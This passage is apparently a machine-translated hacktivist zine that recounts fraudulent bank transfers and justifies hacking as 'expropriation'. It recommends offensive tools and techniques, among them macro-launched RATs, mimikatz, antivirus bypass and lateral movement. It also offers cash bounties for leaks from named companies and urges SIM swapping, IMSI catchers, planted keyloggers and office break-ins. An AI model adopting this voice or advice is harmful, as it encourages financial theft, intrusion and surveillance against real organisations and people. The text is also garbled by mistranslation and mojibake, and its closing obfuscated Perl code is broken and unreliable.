  759. / Who steals from a thief, is one hundred years \
  760. \ sorry. /
  761. -----------------------------------------
  762.         \
  763.          \ ^ __ ^
  764.            (oo) \ _______
  765.         ((__) \) \ / \
  766.          _) / || ---- w |
  767.         (.) / || ||
  768.          ``
  769.  
  770. - [6 - Send money] --------------------------------------- ---------------
  771.  
  772. I had no idea what I was doing, so I was discovering it
  773. along the way. Somehow, the first transfers I sent went
  774. well. The next day, I screwed up by sending a transfer to Mexico that put
  775. End to my fun. This bank sent its international transfers
  776. through its correspondent account in Natwest. I had seen that the
  777. correspondent account for transfers in pounds sterling (GBP) appeared as
  778. NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The
  779. Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a
  780. correspondent. If I had prepared it better I would have known that the GPL instead of
  781. XXX indicated that the payment would be sent through the
  782. United Kingdom Fast Payments Service , rather than as an international transfer, which obviously
  783. not It will work when you are trying to send money to Mexico. So
  784. The bank received an error message. On the same day I also tried to send a
  785. payment of £ 200k to the UK using NWBKGB2LGPL, which was not done because 200k exceeded the
  786. shipping limit through fast payments, and would have had to use NWBKGB2LXXX
  787. instead. They also received an error message for this. They read the messages,
  788. investigated it, and found the rest of my transfers.
  789.  
  790.  
  791. - [7 - The button] ------------------------------------------ --------------------
  792.  
  793. By what I write they will already have a complete idea of ​​what my ideals are and to which
  794. things I give them my support. But I would not like to see anyone in legal trouble
  795. for receiving expropriated funds, so not a word more than where
  796. It was the wool. I know that journalists are probably going to want to put some
  797. number on how many dollars were distributed in this hack and
  798. similar ones, but I prefer not to encourage our perverse habit of measuring the
  799. actions just for their economic value. Any action is admirable if it
  800. comes from love and not from the ego. Unfortunately those above, the rich and
  801. powerful, the public figures, the businessmen, the people in
  802. "important" positions , those that our society respects and values ​​most, those have been
  803. placed where they are based on acting more from the ego than from love. It is in
  804. the simple, humble and "invisible" people that we should look at
  805. who should we admire.
  806.  
  807.  
  808. - [8 - Cryptocurrencies] ------------------------------------------- --------------
  809.  
  810. Redistributing expropriated money to Chilean projects seeking
  811. positive social change would be easier and safer if those projects accepted
  812. anonymous donations via cryptocurrencies such as monero, zcash, or less bitcoin. It is understood
  813. that many of these projects have an aversion to cryptocurrencies, since
  814. they resemble some more hypercapitalist dystopia than the
  815. social economy with which we dream. I share their skepticism, but I think they are
  816. useful to allow donations and anonymous transactions, by limiting the
  817. Government surveillance and control. Same as cash, whose use many
  818. countries are trying to limit for the same reason.
  819.  
  820.  
  821. - [9 - Powershell] ------------------------------------------- -----------------
  822.  
  823. In this operation, as in [1], I made a lot of use of powershell. By
  824. then, powershell was super cool, you could do almost anything you
  825. wanted, without antivirus detection and with very little forensic footprint. It happens
  826. that with the introduction of AMSI [2] the offensive powershell is retiring.
  827. Today the offensive C # is what is on the rise, with tools like
  828. [3] [4] [5] [6]. AMSI is going to get to .NET for 4.8, so to the tools in
  829. C # probably still have a couple of years left before they become outdated.
  830. And then we will use C or C ++ again, or maybe Delphi will become
  831. fashionable again. The specific tools and techniques change every few years, but
  832. basically it is not so much what changes, today hacking is essentially still the
  833. same thing it was in the 90s. In fact all the powershell scripts
  834. used in this guide and in the previous one [1] are still perfectly usable
  835. today, after a small obfuscation of your own harvest.
  836.  
  837. [1] https://www.exploit-db.com/papers/41914
  838. [2] https://medium.com/@byte_St0rm/
  839.    adventures-in-the-wonderful-world-of-amsi-25d235eb749c
  840. [3] https://cobbr.io/SharpSploit.html
  841. [4] https://github.com/tevora-threat/SharpView
  842. [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
  843. [6] https://rastamouse.me/2019/08/ covenant-donut-tikitorch /
  844.  
  845. ___________________________
  846. / Fo Sostyn, Fo Ordaag \
  847. \ Financial Sector Fuck Off /
  848. ---------------------------
  849.         \
  850.          \ ^ __ ^
  851.            (oo) \ _______
  852.         ((__) \) \ / \
  853.          _) / || ---- w |
  854.         (.) / || ||
  855.          ``
  856.  
  857. - [10 - Torrent] ----------------------------------------- ---------------------
  858.  
  859.      Privacy for the weak, transparency for the powerful.
  860.  
  861. Offshore banking provides
  862. executives, politicians and millionaires with privacy to their own government . Exposing them may sound
  863. hypocritical on my part, since I am generally in favor of privacy and
  864. against government oversight. But the law was already written by and
  865. for the rich: it protects its system of exploitation, with some limits (such as
  866. taxes) so that society can function and the system does not collapse under the
  867. weight of its own greed. So no, privacy for the
  868. powerful is not the same , when it allows them to evade the limits of a system
  869. designed to give them privileges; and privacy for the weak, to whom
  870. protects from a system designed to exploit them.
  871.  
  872. Even journalists with the best intentions find it impossible to
  873. study such a huge amount of material and know what is going to be
  874. relevant to people in different parts of the world. When I filtered the
  875. archivos de Hacking Team, entregué a The Intercept una copia de los correos
  876. electronics one month in advance. They found a couple of the 0days that
  877. Hacking Team was using, previously reported them to MS and Adobe and published
  878. a few stories once the leak was made public. There is no point
  879. of comparison with the enormous amount of articles and research that came after
  880. the complete filtration to the public. Seeing it like this, and also considering the (no)
  881. editorialized publication [1] of the Panama papers, I think that a
  882. public and complete leak of this material is the right choice.
  883.  
  884. [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
  885.    protect-western-1-from-panama-leak /
  886.  
  887. Psychologists found that those who are more s down in the hierarchies tend to
  888. understand and empathize with those at the top, but that the opposite is less
  889. common. This explains why, in this sexist world, many men joke about
  890. their inability to understand women, as if it were an
  891. irresolvable mystery . Explain why the rich, if they stop to think about who
  892. They live in poverty, give advice and "solutions" so alien to
  893. reality that they want to laugh. Explain why we revere executives
  894. as brave who take risks. What do they risk, beyond their
  895. privilege? If all their ventures fail, they will have to live and work
  896. like the rest of us. It also explains why there will be many who accuse
  897. this filtering without being irresponsible and dangerous. They feel the
  898. "danger" about an offshore bank and its clients much more intensely
  899. than the misery of those dispossessed by this unfair and
  900. unequal system feels . And the leakage of their finances, is it a danger to them, or
  901. so just for its position on top of a hierarchy maximum to be not even
  902. exist?
  903.  
  904.                          , ------------------------------------------------- -.
  905.          _, -._ | They vilify us, those infamous; when the only |
  906.         ; ___: | difference is that they rob the poor |
  907.    , - '(..' '--.__ | covered by the law, heaven knows, and we |
  908.  _; ||| \ | we plunder the rich under the sole protection of |
  909. '._, -----' ''; = .____, "| our own courage. Shouldn't you prefer to be |
  910.   /// <or> | ## | | one of us, rather than go before those |and then little by little you are improving.
  911.    That is why I always say that one of the most valuable virtues is persistence.
  912.    - Octavia Butler's advice for the APT candidate
  913.  
  914.  
  915.    
  916.  
  917.  
  918.  
  919. The best way to learn to hack is by hacking. Put together a laboratory with
  920. virtual machines and start testing things, taking a break to investigate
  921. anything you don't understand. At a minimum, you will want a windows server
  922. as a domain controller, another normal Windows vm attached to the domain, and a
  923. development machine with visual studio to compile and modify tools.
  924. Try to make an office document with macros that launch meterpreter or another
  925. RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
  926. psexec and other side pass techniques [1]; as well as the other scripts,
  927. tools and techniques mentioned in this guide and in the previous one [2]. To the
  928. At first you can disable windows defender, but then try it all by
  929. having it activated [3] [4] (but deactivating the automatic sending of samples).
  930. Once you're happy with all that, you'll be ready to hack 99% of the
  931. companies. There are a couple of things that at some point will be very useful in your
  932. learning, such as developing comfortably with bash and cmd.exe, a
  933. basic domain of powershell, python and javascript, having knowledge of kerberos [5] [6]
  934. and active directory [7] [8] [9] [10], and a fluent English. A good
  935. introductory book is The Hacker Playbook.
  936.  
  937. I also want to write a little about things to not focus on if you don't
  938. You want to entertain only because someone has told you that you are not a "
  939. real" hacker if you do not know assembler. Obviously, learn whatever interests you,
  940. but I write these lines thinking about those things you can
  941. focus on in order to get practical results if you are looking for hacking
  942. companies to filter and expropriate. A basic knowledge of
  943. web application security [11] is useful, but specializing more in web security is not
  944. really the best use of your time, unless you want to make a career in
  945. pentesting or hunting bug rewards. The CTFs, and most of the
  946. resources you'll find when looking for information about hacking, focus
  947. generally in skills such as web security, reverse engineering,
  948. exploit development , etc. Things that make sense by understanding them as a way to
  949. prepare people for careers in the industry, but not for our
  950. goals. Intelligence agencies can afford to have a team
  951. dedicated to the most advanced in fuzzing, a team working on
  952. exploit development with a team investigating exclusively the new techniques of
  953. mound manipulation, etc. We don't have the time or the
  954. resources for that. The two most important skills for
  955. practical hacking are phishing [12] and social engineering to gain access
  956. initial, and then be able to scale and move through the windows domains.
  957.  
  958. [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
  959. [2] https://www.exploit-db.com/papers/41914
  960. [3] https: // blog. sevagas.com/IMG/pdf/BypassAVDynamics.pdf
  961. [4] https://www.trustedsec.com/blog/
  962.     discovering-the-anti-virus-signature-and-bypassing-it /
  963. [5] https: // www .tarlogic.com / en / blog / how-kerberos-works /
  964. [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
  965. [7] https://hausec.com / 2019/03/05 / penetration-testing-active-directory-part-i /
  966. [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
  967. [9 ] https://adsecurity.org/
  968. [10] https://github.com/infosecn1nja/AD-Attack-Defense
  969. [11] https://github.com/jhaddix/tbhm
  970. [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
  971.      external-engagement-through-spear-phishing /
  972.  
  973.  
  974. --[ 12 - Lecturas Recomendadas ]------------------------------------------------
  975.  
  976.  __________________________________________
  977. / When the scientific level of a world \
  978. | far exceeds its level of solidarity, |
  979. \ that world destroys itself. /
  980.  ------------------------------------------
  981.                   \ _.---. _. .
  982.             * \. ' '. *
  983. * _.- ~ =========== ~ -._
  984.     . (___________________). *
  985.               . ' \ _______ /. '
  986.                            . ' . '  
  987.                           '          
  988.                     - Ami
  989.  
  990. Almost all the hacking today is done by black hat hackers, for
  991. personal gain; or for white hat hackers, for the benefit of the
  992. shareholders (and in defense of the banks, companies and states that are
  993. annihilating us and the planet in which we live); and by military and
  994. intelligence agencies, as part of their war and conflict agenda. Seeing
  995. that this our world is already at the limit, I have thought that, in addition to these
  996. technical tips to learn how to hack, I should include some resources that
  997. have been very important for my development and have guided me in the use of my
  998. Hacking knowledge
  999.  
  1000. * Ami: The Child of the Stars - Enrique Barrios
  1001.  
  1002. * Anarchy Works
  1003.  https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
  1004.  works
  1005.  
  1006. * Living My Life - Emma Goldman
  1007.  
  1008. * The Rise and Fall of Jeremy Hammond: Enemy of the State
  1009.  https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
  1010.  hammond-enemy-of-the-state-183599 /
  1011.  
  1012.  This quarter and the HBGary hack were an inspiration
  1013.  
  1014. * Days of War, Nights of Love - Crimethinc
  1015.  
  1016. * Momo - Michael Ende
  1017.  
  1018. * Letters to a young man poet - Rilke
  1019.  
  1020. * Dominion (Documentary)
  1021.  "we cannot believe that, if we do not look, what we do not want to see will not happen"
  1022.  - Tolstoy in ÐŸÐµÑ € вР° Ñ ?? Ñ ​​?? тупень
  1023.  
  1024. * Bash Back!
  1025.  
  1026.  
  1027. - [13 - Heal] ------------------------------------------- ---------------------
  1028.  
  1029. The hacker world has a high incidence of depression, suicides and certain
  1030. battles with mental health. I don't think it's because of hacking, but because of the
  1031. kind of environment that hackers mostly come from. Like many
  1032. hackers, I grew up with little human contact: I was a girl raised by the internet.
  1033. I have my struggles with depression and emotional numbness. Willie Sutton
  1034. is frequently quoted as saying that he robbed banks because "that's where
  1035. the money is," but the quote is incorrect. What he really said was:
  1036.  
  1037.    Why did he rob banks? Because I enjoyed it. I loved to do it. I was more
  1038.    I live when I was inside a bank, in full robbery, than at any
  1039.    other time in my life. I enjoyed it so much that one or two weeks later I
  1040.    was already looking for the next opportunity. But for me the money was a
  1041.    minutiae, nothing more.
  1042.  
  1043. Hacking has made me feel alive. It started as a way to self-medicate the
  1044. depresión. Más tarde me di cuenta de que, en realidad, podía servir para hacer
  1045. positive. I do not regret the way I grew up at all, it brought several
  1046. beautiful experiences to my life. But I knew I couldn't continue living
  1047. that way. So I started to spend more time away from my computer, with
  1048. other people, learning to open myself to the world, to feel my emotions, to
  1049. connect with others, to accept risks and be vulnerable. Things much
  1050. harder than hacking, but at the mere hour the reward is worth it. It still makes
  1051. me an effort, but even if it is slow and wobbly, I feel that
  1052. I am on the right track.
  1053.  
  1054. Hacking, done with conscience, can also be what heals us. According to the
  1055. Mayan wisdom, we have a gift granted by nature, which we must
  1056. understand to put it at the service of the community. In [1], it is explained:
  1057.  
  1058.    When a person does not accept his work or mission he begins to suffer
  1059.    enfermedades, aparentemente incurables; aunque no llega a morir en corto
  1060.    time, but only suffers, with the aim of waking up or becoming
  1061.    aware. That is why it is essential that a person who has acquired the
  1062.    knowledge and does his work in the communities must pay his Toj and
  1063.    maintain constant communication with the Creator and his ruwäch qâ € ™ ij, since he
  1064.    constantly needs the strength and energy of these. Otherwise,
  1065.    the diseases that reacted They could take the job or
  1066.    return to cause damage ± o.
  1067.  
  1068. If you feel that hacking is fueling your isolation, depression, or other
  1069. conditions, breathe. Give yourself some time to meet and become aware. You
  1070. deserve to live happily, with health and fullness.
  1071.  
  1072. ________________________
  1073. <All Cows Are Beautiful>
  1074. ------------------------
  1075.         \
  1076.          \ ^ __ ^
  1077.            (oo)\_______
  1078.         ((__) \) \ / \
  1079.          _) / || ---- w |
  1080.         (.) / || ||
  1081.          ``
  1082.  
  1083. [1] Ruxeâ € ™ el mayabâ € ™ Kâ € ™ aslemäl: Root and spirit of Mayan knowledge
  1084.    https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
  1085.  
  1086.  
  1087. - [14 - The Bug Hacktivist Program] ------------------------------
  1088.  
  1089. It seems to me that hacking to get and filter documents of interest The public is
  1090. one of the best ways in which hackers can use their skills for the
  1091. benefit of society. Unfortunately for us hackers, as in almost
  1092. every category, the perverse incentives of our economic system do not match
  1093. with what benefits society. So this program is my attempt to
  1094. make it possible for good hackers to earn a living honestly
  1095. by revealing material of public interest, instead of having to
  1096. sell their work to the cybersecurity, cybercrime industries. or
  1097. cyber war. Some examples of companyâ ± AAS whose leaks I'd love to
  1098. pay They're mining companies, logging and cattle looting our
  1099. beautiful Amà © rica Latina (and kill defenders of land and territory
  1100. trying to stop them ), companies involved in attacks on Rojava like
  1101. Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO group,
  1102. war criminals and birds of prey such as Blackwater and Halliburton, private
  1103. penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such
  1104. as ALEC. Pay attention when choosing where to investigate. For example, it is
  1105. well known that oil companies are evil: they get rich at the cost of destroying
  1106. the planet (and back in the 80s the companies themselves already knew the
  1107. consequences of their activity [1]). But if you hack them directly, you will have
  1108. to dive through an incredible amount of boring information about
  1109. their daily operations. You will probably
  1110. find it much easier to find something interesting if instead you focus on your lobbyists [2]. Other
  1111. One way to select viable objectives is to read stories of
  1112. investigative journalists (such as [3]), which are interesting but lack
  1113. solid evidence . And that is exactly what your hacks can find.
  1114.  
  1115. I will pay up to 100 thousand USD for each such leak, according to the interest
  1116. público e impacto del material, y el laburo requerido en el hackeo. Sobra decir
  1117. that a complete leak of the documents and internal communications of
  1118. any of these companies will be a benefit for the society that exceeds
  1119. those one hundred thousand, but I am not trying To enrich anyone. I just want to provide
  1120. enough funds so that hackers can earn a decent living
  1121. doing a good job. Due to time constraints and considerations of
  1122. For sure, I am not going to open the material, nor inspect it for myself, but I will
  1123. read what the press says about it once it has been published, and I will make an
  1124. estimate of the public interest from there. My contact information is
  1125. at the end of the guide mentioned above [4].
  1126.  
  1127. How you get the material is your thing. You can use the traditional
  1128. hacking techniques outlined in this guide and the previous one [4]. You could do a
  1129. swap sim [5] to a corrupt businessman or politician, and then download his emails and
  1130. backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
  1131. its offices. You can do some war-driving (old or new
  1132. [6]). You may be a person within your organizations that already has
  1133. access. You can opt for a low-tech old-school style like in [7] and [8], and
  1134. simply sneak into their offices. Whatever works for you.
  1135.  
  1136. [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
  1137.    Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
  1138. [2] https : //theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
  1139. [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
  1140. [4] https://www.exploit-db.com/papers/41914
  1141. [5] https : //www.vice.com/en_us/article/vbqax3/
  1142.    hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
  1143. [6] https://blog.rapid7.com/2019/09/05/this -one-time-on-a-pen-test-your-mouse-
  1144.    is-my-keyboard /
  1145. [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  1146. [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
  1147.  
  1148.  
  1149. ---- [14.1 - Partial payments] --------------------------------------------------
  1150.  
  1151. Are you a good-hearted waitress working in a company of evil [1]?
  1152. Would you be willing to sneak a physical keylogger into
  1153. an executive's computer, change your USB charging cable for a modified one
  1154. [2], hide a microphone in a meeting room where you plan your
  1155. atrocities, or leave one of these [ 3] forgotten somewhere in the
  1156. offices?
  1157.  
  1158. [1] https://en.wikipedia.org/wiki/Evil_maid_attack
  1159. [2] http://mg.lol/blog/defcon-2019/
  1160. [3] https://shop.hak5.org/products/lan-turtle
  1161.  
  1162. Are you good with social engineering and phishing, and did you get a shell in the
  1163. computer of an employee, or out there got their credentials vpn
  1164. using phishing? But maybe you couldn't get domain admin and download
  1165. what you wanted?
  1166.  
  1167. Did you participate in bug bounce programs and become an expert in
  1168. web application hacking, but don't have enough hacker experience
  1169. to completely penetrate the company?
  1170.  
  1171. Do you have facility with reverse engineering? Scan some evil companies
  1172. to see which devices are exposed to the internet (firewall, vpn, and
  1173. email gateways will be much more useful than things like
  1174. IP cameras ), apply reverse engineering and find some exploitable vulnerability
  1175. remotely.
  1176.  
  1177. If it is possible for me to work with you to penetrate the company and get
  1178. public interest material , you will also be rewarded for your work. If I
  1179. do n't have the time to work on it myself, at least I will try to advise you
  1180. on how to continue until you can complete the hacking on your own.
  1181.  
  1182. Supporting those in power to hack and monitor dissidents, activists and
  1183. the general population is today an industry of several billion
  1184. of dollars, while hacking and exposing those in power is a
  1185. voluntary and risky job. Turning it into an industry of several million
  1186. dollars will certainly not fix that power imbalance, nor will it
  1187. solve the problems of society. But I think it will be fun. So
  1188. ... I want to see people starting to collect their rewards!
  1189.  
  1190.  
  1191. - [15 - Abolish prisons] ----------------------------------------- --------
  1192.  
  1193.                   Built by the enemy to enclose ideas by
  1194.                enclosing companions to silence war cries
  1195.                    is the center of torture and annihilation
  1196.                   where the human being becomes more violent
  1197.              It is the reflection of society, repressive and prison
  1198.                   held and based on authoritative logic
  1199.                       guarded repressed and guarded
  1200.                   thousands of prisoners and prisoners are exterminated
  1201.                 before this schizophrenic and ruthless machine
  1202.                 companion Axel Osorio giving the stripping in the cane
  1203.                  breaking the isolation and silencing
  1204.                  fire and war to jail, we are destroying!
  1205.  
  1206.                    Rap Insurgent - Words In Conflict It
  1207.  
  1208.  
  1209. would be typical to end a zine hacker saying release hammond, release
  1210. manning, free hamza, free detainees by mounting the деР»Ð¾ Сети,
  1211. etc. I will take this tradition to its most radical consequence [1], and to say:
  1212. we must abolish prisons now! Being a criminal myself, you may
  1213. think that what happens is that I have a slightly skewed view of the matter.
  1214. But seriously, it is not even a controversial issue, even the UN
  1215. practically agrees [2]. So, once and for all, free the
  1216. migrants [3] [4] [5] [6], often imprisoned by those same countries that created
  1217. the war and the environmental and economic destruction from which they are fleeing. Free
  1218. all who are in prison for war against those who use drugs [7].
  1219. Free all people imprisoned for war against the poor [8].
  1220. The only thing they do is hide and ignore the proof of the
  1221. existence of social problems, instead of fixing them. And
  1222. until everyone is released, fight the prison system by remembering and
  1223. keeping in mind those who are trapped in there. Send them love,
  1224. letters, helicopters [9], pirate radios [10] and books, and support those who
  1225. organize from in there [11] [12].
  1226.  
  1227. [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
  1228.    Davis-Son-obsoletas-las-prison-final.pdf
  1229. [2] http://www.unodc.org/pdf / criminal_justice / Handbook_of_Basic_Principles_and_
  1230.    Promising_Practices_on_Alternatives_to_Imprisonment.pdf
  1231. [3] https://www.theguardian.com/us-news/2016/dec/21/
  1232.    us-immigration-detention-center-christmas-santa-wish-list
  1233. [4] https: // www. theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
  1234.    images-tucson-arizona
  1235. [5] https://www.playgroundmag.net/now/detras-Centros-Interizaje-Extranjeros-
  1236.    Spain_22648665.html
  1237. [6] https://www.nytimes.com/2019/06/26/world/australia/
  1238.    australia-manus-suicide.html
  1239. [7] https://en.wikiquote.org/wiki/John_Ehrlichman# Quotes
  1240. [8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
  1241.    sci_arttext & pid = S0718-00122012000100005
  1242. [9] p. 10, Libelo No. 2. Political bulletin from the High Security Prison
  1243. [10] https://itsgoingdown.org/transmissions-hostile-territory/
  1244. [11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
  1245. [12] https://incarceratedworkers.org/
  1246.  
  1247.  
  1248. - [16 - Conclusion] -------------------------------- ---------------------------
  1249.  
  1250. Our world is upside down [1]. We have a justice system that
  1251. represents injustice. Law and order are there to create an illusion
  1252. of social peace, and to hide the systematic and profound aspects of exploitation,
  1253. violence, and injustice. Better follow your conscience, and not the law.
  1254.  
  1255. [1] http://resistir.info/livros/galeano_patas_arriba.pdf
  1256.  
  1257. Businessmen enrich themselves by mistreating people and the planet,
  1258. while care work is largely unpaid. Through the
  1259. assault on everything communal, we have somehow built up densely
  1260. populated cities , plagued by loneliness and isolation. The cultural,
  1261. political and economic system in which we live encourages the worst facets of
  1262. human nature : greed, selfishness and self-centeredness, competitiveness, lack of
  1263. compassion and attachment to authority. So that for anyone who has managed to
  1264. remain sensitive and compassionate in a world cold, for all heroÃnas
  1265. everyday practicing goodness in things small ± as, for all you who
  1266. they still have a burning star in their hearts: гоpи, гоpи Ñ ?? Ñ ?? но, Ñ ‡ тоР± Ñ ‹Ð½Ðµ
  1267. погР° Ñ ?? л о!
  1268.  
  1269.                     _____________________
  1270.                    <Let's sing together! >
  1271.                     ---------------------
  1272.                             \
  1273.                              \ ^ __ ^
  1274.                                (oo) \ _______
  1275.                             ((__) \) \ / \
  1276.                              _) / || ---- w |
  1277.                             (.) / || ||
  1278.  
  1279.                                 Open heart,
  1280.  
  1281.                               feel you, open
  1282.  
  1283.                              understanding
  1284.  
  1285.                            Leave the reason aside
  1286.  
  1287.                And let the sun shine inside you
  1288.  
  1289.                
  1290. perl -Mre = eval << \ EOF
  1291.                                       ''                                      
  1292.                                      = ~ (                                      
  1293.                                      '(?'                                    
  1294.                                     . '{'. (                                    
  1295.                                    '' '|'% '                                    
  1296.                                    ). (" \ ["^                                  
  1297.                                   '-'). ('`'                                 |
  1298.                                  '!'). ("\` "|                                  
  1299.                                  ','). '" (\\ $'                                
  1300.                                 . ': = `'. (('' ') |                                
  1301.                                 ' # '). (' ['^'. ' ).                                
  1302.                                 ('[' ^ ')'). ("\` "|                              
  1303.      ','). ('{' ^ '[') .'- '. (' ['^' ('). (' { '^' ['). (' `'|' ('). (' ['^' / '). (' ['^' / '). (    
  1304.     ' ['^' + '). (' [ '^' (').': // '. (' `'|'% '). ('` '|'. '). ('   `'|', '). ('` '|'! '). ("\` "|
  1305.       ' # '). ('` '|'% '). (' ['^'! '). ( '' '|'! '). (' ['^' + '). (' `'|'! '). (' ['^" \ / "). (      
  1306.         '` '|') '). ('[' ^ '('). ('[' ^ '/'). ('`' | '!'). '.'. ('`' | '%'). ('[' ^ ' ! ')       ('' '|'% '). (' ['^'! ')('' '|'% '). (' ['^'! ')
  1307.            . ('' '|', '). (' '' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\ '").          
  1308.              '.'. ('' '|' - '). (' ['^' # ').' / '. (' ['^' ('). (' '' | ('$')). (              
  1309.                 '[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).                
  1310.                     '/`) = ~ '. (' ['^' (').' | </ '. (' ['^' + ').'> | \\ '                  
  1311.                        .' \\ '. (' `'|'. ' ). '|'. ('`' |" '").'; '.                      
  1312.                          '                        $ ^ = ')' ^ '[';
  1313.                  $ / = '' '|'. ';                
  1314.                   $, = '('            
  1315. EOF
  1316.  
  1317.  
  1318.                Nosotras nacimos de la noche.
  1319.                We live in it, we hack in it.
  1320.                
  1321.                Here we are, we are the rebel dignity,
  1322.                the forgotten heart of the Ð˜Ð½Ñ‚ÐµÑ € Ð½ÐµÑ ‚.
  1323.                
  1324.                Our fight is for memory and justice,
  1325.                and bad government is filled with criminals and murderers.
  1326.                
  1327.                Our fight is for fair and decent work,
  1328.                and bad government and corporations buy and sell zero days.
  1329.  
  1330.                For all tomorrow.
  1331.                For us, the cheerful rebellion of leaks
  1332.                and expropriation.
  1333.  
  1334.                For all everything.
  1335.                For us nothing.
  1336.  
  1337.  
  1338.                From the mountains of the Cyber ​​Southeast,
  1339.        
  1340.                 _ _ _ ____ _ _
  1341.                | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  1342.                | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  1343.                | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  1344.                | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement